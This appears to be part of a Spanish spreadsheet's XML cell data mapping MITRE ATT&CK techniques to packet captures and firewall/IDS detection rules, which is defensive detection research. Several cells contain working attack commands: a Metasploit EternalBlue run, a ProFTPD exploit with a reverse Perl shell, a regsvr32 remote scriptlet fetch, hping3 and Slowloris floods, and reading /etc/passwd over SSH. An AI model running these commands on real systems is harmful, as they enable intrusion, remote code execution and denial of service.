    <t>La explotación de EternalBlue se detecta mediante patrones específicos en paquetes SMB (cabeceras y payloads malformados).</t>
  </si>
  <si>
    <t>Uso de exploit Eternalblue para obtener movimiento lateral y establecimiento de meterpreter. Comando: msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.2.2; set LHOST 192.168.1.3; run -z; sessions -c getuid; sessions -k 1; exit"</t>
  </si>
  <si>
    <t>El aprovechamiento de vulnerabilidades en el servicio SMB para realizar diferentes tareas maliciosas siempre constituye un ataque</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.7.1</t>
  </si>
  <si>
    <t>Manual [4] / B.29</t>
  </si>
  <si>
    <t>Manual [2] / 4.1.1.4</t>
  </si>
  <si>
    <t>Ejecución de código remoto basado en vulnerabilidades de servidor FTP</t>
  </si>
  <si>
    <t>T1210-Remote_code_execution_[2].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Regla genérica que detecte intento de ejecucion remota de codigo en servidor FTP </t>
  </si>
  <si>
    <t>Requiere inspección de comandos FTP maliciosos (como PUT, MKD, etc.), no identificables en flujos.</t>
  </si>
  <si>
    <t>Uso de comandos SITE/CPFR/CPTO en la version 1.3.5 de ProFTPD  que permite copiar ficheros a cualquier usuario no autenticado. Comando: msfconsole -x "use exploit/unix/ftp/proftpd_modcopy_exec; set RHOSTS 192.168.2.2; set SITEPATH /var/www/html; set LHOST 192.168.1.3; set LPORT 4444; set payload cmd/unix/reverse_perl; run -z; sessions -c ls; sessions -k 1; exit"</t>
  </si>
  <si>
    <t>La ejecución de código remoto aprovechando vulnerabilidades en el servidor FTP siempre es un ataque</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.7.2</t>
  </si>
  <si>
    <t>Manual [4] / B.30</t>
  </si>
  <si>
    <t>Manual [2] /  4.2.1.9</t>
  </si>
  <si>
    <t>Ataque Web</t>
  </si>
  <si>
    <t>DVWA, In-house selenium framework</t>
  </si>
  <si>
    <t>T1210-Web_attack-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Si es ataque web genérico sin detalles, es muy difícil afirmarlo. No se especifica patrón concreto, y depende de implementación.</t>
  </si>
  <si>
    <t>El ataque no está especificado en detalle, pero si es un ataque web genérico, requiere inspección del contenido para detectar vulnerabilidad.</t>
  </si>
  <si>
    <t>Un ataque web siempre es considerado como tal</t>
  </si>
  <si>
    <t>Manual [4] / B.36</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>T1218.010</t>
  </si>
  <si>
    <t>Ejecución de COM scriptlet remoto</t>
  </si>
  <si>
    <t>Regsvr32.exe</t>
  </si>
  <si>
    <t>T1218.010-COM_Scriptlet_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un intento de aprovechamiento de la vulnerabilidad del servicio regsvr32 de Windows</t>
  </si>
  <si>
    <t>Requiere inspección del tráfico para detectar ejecución de scriptlets COM que no son visibles en análisis de flujo.</t>
  </si>
  <si>
    <t>Aprovechar vulnerabilidad regsvr32.exe descargando y ejecutando scripts y librerias evadiendo controles de seguridad Windows. Comando: C:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll</t>
  </si>
  <si>
    <t>La ejecucion de un scriptlet remoto siempre se considera como un ataque</t>
  </si>
  <si>
    <t>Manual [2] /  3.3.1.1</t>
  </si>
  <si>
    <t>Manual [5] / C.25</t>
  </si>
  <si>
    <t>Remote Access Software</t>
  </si>
  <si>
    <t>Uso de TeamViewer para establecer canal de comunicación alternativo</t>
  </si>
  <si>
    <t>UDP</t>
  </si>
  <si>
    <t>TeamViewer</t>
  </si>
  <si>
    <t>T1219-RemoteAccessSoftwareLocal_[5].pcapng</t>
  </si>
  <si>
    <t>Monitorizar tráfico de red correspondiente a softwares de acesso remoto (AnyDesk, TeamViewer...). En su defecto, Deteccion por listas negras/anomalías. Hay firmas que detectan tráfico TeamViewer por puertos específicos o handshake inicial.
Detectable si se tienen firmas específicas de protocolo TeamViewer.</t>
  </si>
  <si>
    <t>TeamViewer puede ser identificado por patrones de flujo (puertos, frecuencia) o por firmas de protocolo específicas (handshake, payloads).</t>
  </si>
  <si>
    <t>Conexion mediante TeamViewer entre dos equipos</t>
  </si>
  <si>
    <t>Dependiendo de las circunstancias, el uso de un software de acceso remoto puede ser tráfico legitimo</t>
  </si>
  <si>
    <t>Manual [5] / 4.8.3</t>
  </si>
  <si>
    <t>Manual [5] / C.7</t>
  </si>
  <si>
    <t>Manual [5] /  5.11.9</t>
  </si>
  <si>
    <t>T1219-RemoteAccessSoftwareNAT_[5].pcapng</t>
  </si>
  <si>
    <t>Inyectar un fichero mediante Phishing .docx con macros modificadas que permita pasar desapercibido</t>
  </si>
  <si>
    <t>Sitios web convencionales (Gmail)</t>
  </si>
  <si>
    <t>T1221-Template_Injection_[5].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte la inyección de macros o plantillas para llevar a cabo un ataque de Phishing, usando como medio mecanismos convencionales de comunicación (mensajes SMTP, por ejemplo)</t>
  </si>
  <si>
    <t>Detectable solo si se inspecciona el contenido de plantillas o macros embebidas en el tráfico HTTP o SMTP.</t>
  </si>
  <si>
    <t>Modificación de fichero .docx para, mediante macros, provocar la descarga y ejecución de malware en el equipo víctima</t>
  </si>
  <si>
    <t>El tráfico puede parecer ser legítimo en una inyección de plantilalas (.DOTM)</t>
  </si>
  <si>
    <t>Manual [5] / 4.4.1</t>
  </si>
  <si>
    <t>Manual [5] / C.8</t>
  </si>
  <si>
    <t>Manual [5] /  5.6.5</t>
  </si>
  <si>
    <t>Descubrimiento de dominios de confianza en entorno Active Directory</t>
  </si>
  <si>
    <t>LDAP</t>
  </si>
  <si>
    <t>dsquery</t>
  </si>
  <si>
    <t>T1482-Domain_trust_discovery_[4].pcapng</t>
  </si>
  <si>
    <t>Regla personalizada que detecte paquetes LDAP, procedentes de equipos que no son DC en la red (configurable manualmente) y con la cadena objectClass=trustedDomain</t>
  </si>
  <si>
    <t>La consulta al dominio (LDAP) requiere inspección del contenido para distinguir operaciones de descubrimiento del tráfico legítimo.</t>
  </si>
  <si>
    <t>El descubrimiento de dominios de confianza puede ser una actividad legítima</t>
  </si>
  <si>
    <t>Manual [4] /  3.13</t>
  </si>
  <si>
    <t>Manual [4] / B.13</t>
  </si>
  <si>
    <t>Manual [4] / 4.13</t>
  </si>
  <si>
    <t>Internal Defacement</t>
  </si>
  <si>
    <t>T1491.001</t>
  </si>
  <si>
    <t>Modificar fondo de pantalla equipo victima</t>
  </si>
  <si>
    <t>T1491.001-Internal_Defacement_[5].pcapng</t>
  </si>
  <si>
    <t>Detectable por listas negras/anomalías</t>
  </si>
  <si>
    <t>Detectable por comportamiento anómalo (modificación gráfica interna), no requiere DPI salvo que se observe contenido PowerShell explícito.</t>
  </si>
  <si>
    <t>Esta acción puede considerarse tráfico legítimo</t>
  </si>
  <si>
    <t>Manual [5] / 4.10.1</t>
  </si>
  <si>
    <t>Manual [5] / C.9</t>
  </si>
  <si>
    <t>Manual [5] /  5.13.1</t>
  </si>
  <si>
    <t>Descarga y puesta en marcha de software de criptominado</t>
  </si>
  <si>
    <t>XMRIG</t>
  </si>
  <si>
    <t>T1496-Cryptomining_[2].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías</t>
  </si>
  <si>
    <t xml:space="preserve"> Detectable por análisis de comportamiento: tráfico continuo e inusual a servidores de minería; no se requiere inspección de contenido.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Instalacion y uso de software de minado. Comando: wget </t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="10"/>
        <color rgb="FF1155CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-linux-x64.tar.gz</t>
    </r>
  </si>
  <si>
    <t>El uso de un software de criptominado siempre se considera como un ataque</t>
  </si>
  <si>
    <t>Manual [2] /  3.3.2.1</t>
  </si>
  <si>
    <t>Manual [5] / C.26</t>
  </si>
  <si>
    <t>Manual [2] / 4.2.2.3</t>
  </si>
  <si>
    <t>Reflection Amplification</t>
  </si>
  <si>
    <t>T1498.002</t>
  </si>
  <si>
    <t>Amplificación DNS</t>
  </si>
  <si>
    <t>dnsdrdos</t>
  </si>
  <si>
    <t>T1498-Amplif_dns_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de respuestas DNS no solicitadas con un mismo nombre resuelto hacia la red protegida</t>
  </si>
  <si>
    <t>Se detecta por la inspección de tráfico DNS con respuestas masivas no solicitadas; requiere DPI para validar cabeceras y tipo de consulta.</t>
  </si>
  <si>
    <t>Siempre se considera como ataque la amplificacion DNS</t>
  </si>
  <si>
    <t>Manual [1] /  3.5.1</t>
  </si>
  <si>
    <t>Manual [1] / E.14</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.35 y Manual [5] / 5.13.3</t>
  </si>
  <si>
    <t>Fraggle</t>
  </si>
  <si>
    <t>Chargen</t>
  </si>
  <si>
    <t>T1498-Fraggle_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de datagramas UDP hacia un puerto concreto, con fin de saturarlo y causar su inoperatividad</t>
  </si>
  <si>
    <t>El ataque utiliza respuestas Chargen maliciosas, solo visibles inspeccionando paquetes UDP.</t>
  </si>
  <si>
    <t>Una denegación de servicio siempre es un ataque</t>
  </si>
  <si>
    <t>Manual [1] /  3.4.5</t>
  </si>
  <si>
    <t>Manual [1] / E.13</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.36 y Manual [5] / 5.13.3</t>
  </si>
  <si>
    <t>Smurf</t>
  </si>
  <si>
    <t>T1498-Smurf_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de respuestas ICMP</t>
  </si>
  <si>
    <t>Inundación ICMP con direcciones IP spoofed debe identificarse mediante DPI para validar contenido y encabezados ICMP.</t>
  </si>
  <si>
    <t>Manual [1] /  3.3.1</t>
  </si>
  <si>
    <t>Manual [1] / E.7</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.37 y Manual [5] / 5.13.3</t>
  </si>
  <si>
    <t>Direct Network Flood</t>
  </si>
  <si>
    <t>T1498.001</t>
  </si>
  <si>
    <t>Inundación HTTP</t>
  </si>
  <si>
    <t>T1498.001-HTTP_flood-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte envío masivo de mensajes HTTP</t>
  </si>
  <si>
    <t>El envío masivo de solicitudes HTTP puede detectarse por flujos (cantidad, tasa) o por DPI (headers repetitivos, User-Agent).</t>
  </si>
  <si>
    <t>Manual [4] / B.37</t>
  </si>
  <si>
    <t>Manual [5] / 5.13.3</t>
  </si>
  <si>
    <t>Inundación TCP</t>
  </si>
  <si>
    <t>T1498.001-TCP_flood-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte envío masivo de mensajes TCP</t>
  </si>
  <si>
    <t>Puede detectarse tanto por volumen de conexiones en flujos como por estructura de las solicitudes (DPI).</t>
  </si>
  <si>
    <t>Inundación UDP</t>
  </si>
  <si>
    <t xml:space="preserve">  Caldera, hping3</t>
  </si>
  <si>
    <t>T1498.001-UDP_flood_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de mensajes UDP con destino el mismo puerto objetivo</t>
  </si>
  <si>
    <t>Ataque de volumen que puede identificarse por flujos (frecuencia, destino) o por inspección de carga UDP si es estructurada.</t>
  </si>
  <si>
    <t>Inundacion UDP en la red de la víctima. Comando: timeout 10s hping3 --udp --flood 192.168.2.2</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.10.2</t>
  </si>
  <si>
    <t>Manual [2]</t>
  </si>
  <si>
    <t>T1498.001-UDP_flood_1-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Manual [5] / C.28</t>
  </si>
  <si>
    <t>T1498.001-UDP_flood_2-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Service Exhaustion Flood</t>
  </si>
  <si>
    <t>T1499.002</t>
  </si>
  <si>
    <t>Inundación DHCP / Inanición</t>
  </si>
  <si>
    <t>DHCP</t>
  </si>
  <si>
    <t>DHCPig, yersinia</t>
  </si>
  <si>
    <t>T1499-Dhcp_flood_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de procedimientos DHCP completos (DISCOVERY, OFFER, REQUEST, ACK)</t>
  </si>
  <si>
    <t>Requiere inspección de mensajes DHCP para identificar solicitudes anómalas (DISCOVER, REQUEST masivos).</t>
  </si>
  <si>
    <t>El aagotamiento del pool de direcciones de un servidor DHCP siempre es un ataque</t>
  </si>
  <si>
    <t>Manual [1] /  2.4.2.1.1</t>
  </si>
  <si>
    <t>Manual [1] / E.18</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.39 y Manual [5] / 5.13.2</t>
  </si>
  <si>
    <t>OS Exhaustion Flood</t>
  </si>
  <si>
    <t>T1499.001</t>
  </si>
  <si>
    <t>LAND</t>
  </si>
  <si>
    <t>T1499-Land_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte envío de mensajes TCP SYN procedentes de la misma dirección IP a la que van dirigidos los paquetes. Los puertos origen/destino pueden ser incluso idénticos</t>
  </si>
  <si>
    <t>Detectable únicamente si se inspecciona que IP origen y destino son iguales en los paquetes TCP SYN (característico del LAND attack).</t>
  </si>
  <si>
    <t>Manual [1] /  2.3.1.1.5</t>
  </si>
  <si>
    <t>Manual [1] / E.11</t>
  </si>
  <si>
    <t>Manual [5] / 5.13.2</t>
  </si>
  <si>
    <t>Reflexión SYN-ACK</t>
  </si>
  <si>
    <t>T1499-Reflexion_synack_[1].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte el envío de mensajes TCP SYN-ACK no solicitados previamente por el la red a proteger</t>
  </si>
  <si>
    <t>Solo detectable inspeccionando el envío de respuestas SYN-ACK no solicitadas. El análisis de flujo no da contexto suficiente.</t>
  </si>
  <si>
    <t>Manual [1] /  3.4.2</t>
  </si>
  <si>
    <t>Manual [1] / E.10</t>
  </si>
  <si>
    <t>Reseteo de Conexión</t>
  </si>
  <si>
    <t>ettercap, netwox, nping</t>
  </si>
  <si>
    <t>T1499-Reseteo_[1].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías que identifique reseteos de conexión periódicos y desde direcciones sospechosas</t>
  </si>
  <si>
    <t>Detectable por anomalías en secuencia de reseteos de conexión frecuentes desde direcciones sospechosas.</t>
  </si>
  <si>
    <t>Manual [1] /  2.3.1.1.6</t>
  </si>
  <si>
    <t>Manual [1] / E.12</t>
  </si>
  <si>
    <t>Inundación SYN con suplantación</t>
  </si>
  <si>
    <t>T1499-Syn_suplantacion_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el envío prolongado de mensajes TCP SYN que dejan los sockets del equipo a proteger en estado SYN-RECV (no se terminan los handshake de las conexiones TCP establecidas)</t>
  </si>
  <si>
    <t>Se requiere DPI para verificar que los paquetes TCP SYN provienen de direcciones IP falsificadas (spoofed).</t>
  </si>
  <si>
    <t>Manual [1] /  2.3.1.1.3</t>
  </si>
  <si>
    <t>Manual [1] / E.9</t>
  </si>
  <si>
    <t>Denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>T1499.001-OS_Exhaustion_Flood_[3].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte el uso de Slowloris para realizar ataque DDos mediante la comprobación de campos de bytes típicos de la herramienta</t>
  </si>
  <si>
    <t>Requiere inspección del contenido HTTP (peticiones incompletas y parciales mantenidas abiertas).</t>
  </si>
  <si>
    <t>Uso de metasploit para ataque DoS con herramienta Slowloris. Comando: use auxiliary/dos/http/slowloris</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.16</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.16.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.16.5 y Manual [5] / 5.13.2</t>
  </si>
  <si>
    <t>Envio solicitudes HTTP a baja tasa</t>
  </si>
  <si>
    <t>Slowhttptest</t>
  </si>
  <si>
    <t>T1499.002-Slowhttptest-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte el envío de mensajes HTTP a baja tasa</t>
  </si>
  <si>
    <t>Detectable mediante DPI observando cabeceras HTTP enviadas muy lentamente y sin completar la solicitud.</t>
  </si>
  <si>
    <t>Uso de Slowhttptest para denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>Manual [5] / C.29</t>
  </si>
  <si>
    <t>Envio solicitudes HTTP parciales</t>
  </si>
  <si>
    <t>Slowloris</t>
  </si>
  <si>
    <t>T1499.002-Slowloris-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte el envío de mensajes HTTP parciales o uso de Slowloris</t>
  </si>
  <si>
    <t>Ataque que envía peticiones HTTP parciales; solo DPI permite detectar este comportamiento característico.</t>
  </si>
  <si>
    <t>Uso de Slowloris para denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>Application Exhaustion Flood</t>
  </si>
  <si>
    <t>T1499.003</t>
  </si>
  <si>
    <t>GoldenEye</t>
  </si>
  <si>
    <t>T1499.003-GoldenEye-C2018_[6].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve"> Reglas que detecen envío masivo de solicitudes a servidor web</t>
  </si>
  <si>
    <t>Puede detectarse tanto por patrones de flujo como por contenido repetitivo en paquetes.</t>
  </si>
  <si>
    <t>Uso de GoldenEye para denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>Hulk</t>
  </si>
  <si>
    <t>T1499.003-Hulk-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Uso de Hulk para denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>T1505.003</t>
  </si>
  <si>
    <t>Shell Web</t>
  </si>
  <si>
    <t>T1505.003-Shell_Web_[2].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Regla genérica que detecta el intento de escaneo para comprobar la existencia de backdoor. </t>
  </si>
  <si>
    <t>Las cadenas características de una web shell se detectan en el contenido del paquete.</t>
  </si>
  <si>
    <t>El ataque busca aprovechar configuracion vulnerable de un servidor WampServer que permite subir y borrar contenido web mediante el uso de HTTP PUT y HTTP DELETE.
Se realiza la subida de un payload a un servidor web</t>
  </si>
  <si>
    <t>La creación de un Shell Remoto haciendo uso de una conexión web siempre es un ataque</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.5.1</t>
  </si>
  <si>
    <t>Manual [5] / C.31</t>
  </si>
  <si>
    <t>Internal Spear-phishing</t>
  </si>
  <si>
    <t>Phishing interno entre equipos pertenecientes a un dominio con servidor de correo habilitado</t>
  </si>
  <si>
    <t>SMTP</t>
  </si>
  <si>
    <t>MailEnabler, Thunderbird</t>
  </si>
  <si>
    <t>T1534-Internal_spearphishing_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías, análisis de la estructura de correos electrónicos, petición de información confidencial, etc. Generalmente requiere inspección semántica del contenido; reglas genéricas no son suficientes.</t>
  </si>
  <si>
    <t>El spearphishing interno, cuando implica el envío de correos electrónicos dentro de una red, puede detectarse mediante DPI si inspeccionamos el cuerpo del mensaje (por ejemplo, contenido HTML, links o adjuntos maliciosos).
Pero también puede ser detectable solo con flujos, si observamos un comportamiento anómalo como:
Un host interno que comienza a enviar grandes volúmenes de correos (nunca lo había hecho antes).
Comunicaciones inusuales entre segmentos que antes no interactuaban.
Herramientas SIEM o NDR pueden detectar anomalías de flujo sin necesidad de inspeccionar el contenido del correo.</t>
  </si>
  <si>
    <t>El Phishing, en general, puede confundirse con actividad legítima (eso es lo que hace que el ataque tenga éxito). En ese sentido, aunque siempre será un ataque, dependiendo del contexto podrá no distinguirse de una actividad legítima</t>
  </si>
  <si>
    <t>Manual [4] /  3.14</t>
  </si>
  <si>
    <t>Manual [4] / B.14</t>
  </si>
  <si>
    <t>Manual [4] / 4.14</t>
  </si>
  <si>
    <t>Transferir archivos de una cuenta a otra mediante un servicio en la nube</t>
  </si>
  <si>
    <t>OneDrive</t>
  </si>
  <si>
    <t>T1537-Transfer_Data_to_Cloud_Account_[5].pcapng</t>
  </si>
  <si>
    <t>Deteccion por listas negras/anomalías. Exfiltración por canales normales requiere correlación/análisis comportamental.</t>
  </si>
  <si>
    <t>Es necesario el contenido para identificar fuga, y flujos para detectar anomalías.</t>
  </si>
  <si>
    <t>Transferir entre dos cuentas en la nube unos ficheros</t>
  </si>
  <si>
    <t>Transferir datos a la nube puede considerarse tráfico legítimo o ataque dependiendo de las circunstancias</t>
  </si>
  <si>
    <t>Manual [5] /  4.9.2</t>
  </si>
  <si>
    <t>Manual [5] / C.10</t>
  </si>
  <si>
    <t>Manual [5] /  5.12.6</t>
  </si>
  <si>
    <t>TFTP Boot</t>
  </si>
  <si>
    <t>T1542.005</t>
  </si>
  <si>
    <t xml:space="preserve">Modificación de imagen de SO mediante la suplantación de un Server TFTP </t>
  </si>
  <si>
    <t>TFTP</t>
  </si>
  <si>
    <t>T1542.005-TFTP_Boot_[5].pcapng</t>
  </si>
  <si>
    <t>Regla personalizada que comprueba si la IP del servidor TFTP es la del servidor legítimo; o que el SO enviado por el atacante contenga algun tipo de malware detectable por un IDS</t>
  </si>
  <si>
    <t>El ataque se detecta por patrones anómalos en el flujo de comunicación.</t>
  </si>
  <si>
    <t>Servidor TFTP utilizando Iventoy</t>
  </si>
  <si>
    <t>El arranque mediante TFTP desde otro servidor TFTP siempre se considera como un ataque</t>
  </si>
  <si>
    <t>Manual [5] /  4.3.2</t>
  </si>
  <si>
    <t>Manual [5] / C.11</t>
  </si>
  <si>
    <t>Manual [5] /  5.5.3</t>
  </si>
  <si>
    <t>Windows Service</t>
  </si>
  <si>
    <t>T1543.003</t>
  </si>
  <si>
    <t>Creación o modificación de servicio de Windows para garantizar la persistencia</t>
  </si>
  <si>
    <t>T1543.003-CreateSystemProcessWindowsService_[5].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías. No existen firmas públicas conocidas que lo cubran sin adaptación o contexto específico.</t>
  </si>
  <si>
    <t>La creación/modificación de servicios puede deducirse por comportamiento de red.</t>
  </si>
  <si>
    <t>Crear servicio Windows para garantizar persistencia</t>
  </si>
  <si>
    <t>La creacion de un servicio de Windows puede considerarse como tráfico legítimo pero tambien como un ataque dependiendo. Esta accion podria realizarla un administrador de red o un atacante</t>
  </si>
  <si>
    <t>Manual [5] / 4.3.4</t>
  </si>
  <si>
    <t>Manual [5] / C.43</t>
  </si>
  <si>
    <t>Manual [5] / 5.5.6</t>
  </si>
  <si>
    <t>DHCP Spoofing</t>
  </si>
  <si>
    <t>T1557.003</t>
  </si>
  <si>
    <t>DHCPig, servidor DHCP</t>
  </si>
  <si>
    <t>T1557-Dhcp_spoofing_[1].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Regla genérica que detecte un envío masivo de procedimientos DHCP completos (DISCOVERY, OFFER, REQUEST, ACK). Otra alternativa es una regla personalizada que analice mensajes DHCP ACK con direcciones IP de servidores DNS distinta a la establecida en la red </t>
  </si>
  <si>
    <t>Los ataques de ARP/DHCP spoofing dependen de contenido de paquetes manipulados.</t>
  </si>
  <si>
    <t>DHCP Spoof siempre se considera como un ataque</t>
  </si>
  <si>
    <t>Manual [1] /  2.4.2.1.2</t>
  </si>
  <si>
    <t>Manual [1] / E.19</t>
  </si>
  <si>
    <t>Manual [5] / 5.7.3</t>
  </si>
  <si>
    <t>RDP Hijacking</t>
  </si>
  <si>
    <t>T1563.002</t>
  </si>
  <si>
    <t>Secuestro de sesión RDP mediante tscon.exe</t>
  </si>
  <si>
    <t>tscon.exe</t>
  </si>
  <si>
    <t>T1563.002-RDPHijacking_[5].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el intento de establecimiento de sesiones RDP poco convenciales, haciendo uso de los protocolos mínimos de seguridad.</t>
  </si>
  <si>
    <t>Uso de Windows Server 2012 R2 con DNS, Active Directory y Servicio de Escritorio Remoto</t>
  </si>
  <si>
    <t>El secuestro de una sesion RDP siempre se considera como un ataque</t>
  </si>
  <si>
    <t>Manual [5] /  4.7.1</t>
  </si>
  <si>
    <t>Manual [5] / C.12</t>
  </si>
  <si>
    <t>Manual [5] /  5.9.3</t>
  </si>
  <si>
    <t>Transmitted Data Manipulation</t>
  </si>
  <si>
    <t>T1565.002</t>
  </si>
  <si>
    <t>Spearphishing Attachment</t>
  </si>
  <si>
    <t>T1566.001</t>
  </si>
  <si>
    <t>Envío de emails con documentos maliciosos</t>
  </si>
  <si>
    <t>T1566.001-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Si los mensajes contienen determinados patrones como intentos de creación de Shells remotos sí que pueden ser detectados por los cortafuegos en base a reglas que detecten cadenas específicas en los paquetes</t>
  </si>
  <si>
    <t>Requiere DPI para inspeccionar correos + flujos para detectar anomalías.</t>
  </si>
  <si>
    <t>En general, el envio de documentos por email puede verse como tráfico legitimo pero dependiendo de las circunstancias puede ser un ataque</t>
  </si>
  <si>
    <t>Manual [5] /  5.3.5</t>
  </si>
  <si>
    <t>Spearphishing Link</t>
  </si>
  <si>
    <t>T1566.002</t>
  </si>
  <si>
    <t>Obtener un acceso inicial mediante ingeniería social utilizando un enlace adjunto en un correo que descargue un fichero que establezca una sesión al equipo víctima</t>
  </si>
  <si>
    <t>SEToolKit, Metasploit</t>
  </si>
  <si>
    <t>T1566.002-Spearphishing_Link_[5].pcapng</t>
  </si>
  <si>
    <t>Detección por listas negras/anomalías que permitan detectar tráfico de red correspondiente a correos electrónicos con enlaces maliciosos que contengan contenido malware</t>
  </si>
  <si>
    <t>Servidor de correo mediante Postfix, Thunderbird, Bind, Dovecot</t>
  </si>
  <si>
    <t>Manual [5] /  4.2.2</t>
  </si>
  <si>
    <t>Manual [5] / C.13</t>
  </si>
  <si>
    <t>Exfiltration over Web Service</t>
  </si>
  <si>
    <t>Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t>T1567.002</t>
  </si>
  <si>
    <t>Exfiltrar datos de un equipo a la nube</t>
  </si>
  <si>
    <t>Google Drive</t>
  </si>
  <si>
    <t>T1567.002-Exfiltration_To_Cloud_Storage_[5].pcapng</t>
  </si>
  <si>
    <t>Transferir ficheros de un equipo a la nube</t>
  </si>
  <si>
    <t>La exfiltracion de datos a la nube puede considerarse como una actividad legítima en determinados casos. Sin embargo, tambien puede ser una manera de ataque</t>
  </si>
  <si>
    <t>Manual [5] /  4.9.3</t>
  </si>
  <si>
    <t>Manual [5] / C.14</t>
  </si>
  <si>
    <t>Manual [5] /  5.12.8</t>
  </si>
  <si>
    <t>Fast Flux DNS</t>
  </si>
  <si>
    <t>T1568.001</t>
  </si>
  <si>
    <t>Esconder un C2 Server mediante un servidor DNS con bajo TTL y modo Fast Flux</t>
  </si>
  <si>
    <t>bind, Metasploit</t>
  </si>
  <si>
    <t>T1568-fastFluxDNS_[5].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte una respuesta DNS que devuelva varias direcciones IP. Es decir, detecta el comportamiento de un DNS Round Robin</t>
  </si>
  <si>
    <t>Servidor DNS "Round Robin"</t>
  </si>
  <si>
    <t>El ataque del pcap permuta entre 2 IPs de servidores DNS. En algunos entornos, esto puede ser un funcionamiento legítimo</t>
  </si>
  <si>
    <t>Manual [5] / 4.8.4</t>
  </si>
  <si>
    <t>Manual [5] / C.15</t>
  </si>
  <si>
    <t>Manual [5] /  5.11.10</t>
  </si>
  <si>
    <t>Service Execution</t>
  </si>
  <si>
    <t>T1569.002</t>
  </si>
  <si>
    <t>Ejecución de un Servicio / Fichero Ejecutable de manera remota</t>
  </si>
  <si>
    <t>SVCCTL</t>
  </si>
  <si>
    <t>PsExec</t>
  </si>
  <si>
    <t>T1569-System_services_service_execution_[4].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Existen múltiples métodos de detección. Como ejemplos:
        Regla que detecte la cadena “PSEXESVC” en el contenido de mensajes SMBv2
        Regla que detecte archivos ejecutables en mensajes SMB
</t>
  </si>
  <si>
    <t>La creación de un servicio o proceso de forma remota es legítima cuando el usuario permite o autoriza dicho movimiento</t>
  </si>
  <si>
    <t>Manual [4] /  3.6</t>
  </si>
  <si>
    <t>Manual [4] / B.6</t>
  </si>
  <si>
    <t>Manual [4] / 4.6</t>
  </si>
  <si>
    <t>Transferencia de herramientas para la continuación del ataque entre máquinas utilizando protocolos de compartición de archivos</t>
  </si>
  <si>
    <t>T1570-Lateral_Tool_Transfer_[5].pcapng</t>
  </si>
  <si>
    <t>Transferencia mediante FTP de ficheros entre dos equipos</t>
  </si>
  <si>
    <t>La transferencia de herramientas entre equipos no necesariamente implica un ataque.</t>
  </si>
  <si>
    <t>Manual [5] /  4.7.2</t>
  </si>
  <si>
    <t>Manual [5] / C.16</t>
  </si>
  <si>
    <t>Manual [5] /  5.9.4</t>
  </si>
  <si>
    <t>Ejecución de comandos de forma remota (no constituyen el ataque en sí) -  T1059</t>
  </si>
  <si>
    <t>Sesión SSH en puerto 2200</t>
  </si>
  <si>
    <t>ssh</t>
  </si>
  <si>
    <t>T1571-SSH_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el uso de SSH sobre un puerto no estándar</t>
  </si>
  <si>
    <t>Establecer una sesion SSH sobre un puerto no estandar. Comando: sshpass -p salas ssh salas@192.168.2.2 -p 2200 cat /etc/passwd</t>
  </si>
  <si>
    <t>El uso de SSH en otros puertos es una acción legítima muy común en ciertos entornos</t>
  </si>
  <si>
